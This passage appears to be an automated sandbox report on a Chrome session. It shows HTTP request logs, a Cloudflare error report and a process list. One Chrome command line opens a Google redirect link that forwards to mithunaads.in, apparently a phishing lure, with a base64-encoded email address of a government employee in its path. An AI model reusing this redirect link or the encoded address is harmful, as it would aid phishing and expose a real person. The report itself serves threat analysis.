                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:30 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: OPTIONS, POST
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Fri, 13 Sep 2024 13:07:30 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        88192.168.2.54985135.190.80.14433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:30 UTC479OUTPOST /report/v4?s=zHmaNT1qx8G57SnTYFFYFSsgpZAdHZ9PysUswhbqmfcChtngJvyJ%2BJ4c1K7h0YdyL4sDDjIaieIP%2BW9%2FGPlBJT5uYwJWpq6dKiZxOQAzQaR5Jv%2FDmdXlPOTmnfJDhA%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 1333
                                                        Content-Type: application/reports+json
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:30 UTC1333OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 38 31 33 37 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 39 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 35 35 2e 31 32 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 61 6a 2e 6d 6f 72 64 61 6e 74
                                                        Data Ascii: [{"age":28137,"body":{"elapsed_time":1193,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.55.124","status_code":404,"type":"http.error"},"type":"network-error","url":"https://saj.mordant
                                                        2024-09-13 13:07:31 UTC168INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        date: Fri, 13 Sep 2024 13:07:30 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:09:06:14
                                                        Start date:13/09/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff715980000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:09:06:20
                                                        Start date:13/09/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2312,i,3901207920137646878,15146386042684683243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                        Imagebase:0x7ff715980000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:3
                                                        Start time:09:06:22
                                                        Start date:13/09/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw=="
                                                        Imagebase:0x7ff715980000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        No disassembly